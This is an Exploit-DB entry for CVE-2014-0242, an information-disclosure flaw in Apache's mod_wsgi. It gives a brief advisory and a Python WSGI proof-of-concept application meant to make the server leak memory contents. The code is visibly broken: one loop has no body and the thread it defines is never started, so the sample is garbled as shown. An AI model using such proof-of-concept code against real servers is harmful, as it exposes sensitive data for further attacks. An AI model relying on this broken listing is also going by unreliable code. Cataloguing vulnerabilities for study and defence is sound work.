Apache 'mod_wsgi' Module Information Disclosure Vulnerability

ID EDB-ID:39196
Type exploitdb
Reporter Buck Golemon
Modified 2014-05-21T00:00:00


Apache 'mod_wsgi' Module Information Disclosure Vulnerability. CVE-2014-0242. Remote exploit for linux platform

                                            source: http://www.securityfocus.com/bid/67534/info

mod_wsgi is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. 

import functools
import threading
import time
import random
def run(*args):
    while True:
        items = []
        for i in range(1000):
thread = threading.Thread(target=run)
def headers():
    return [('Content-Type', 'text/plain'.upper().lower())]
def response():
    yield 'Hello World!\n'
_content_type_cache = {}
def intern_content_type(application):
    def _wrapper(environ, start_response):
        def _start_response(status, headers, *args):
            _headers = []
            for header, value in headers:
                if header.lower() == 'content-type':
                    value = _content_type_cache.setdefault(value, value)
                _headers.append((header, value))
            return start_response(status, _headers, *args)
        return application(environ, _start_response)
    return _wrapper
def application(environ, start_response):
    status = '200 OK'
    start_response(status, headers())
    return response()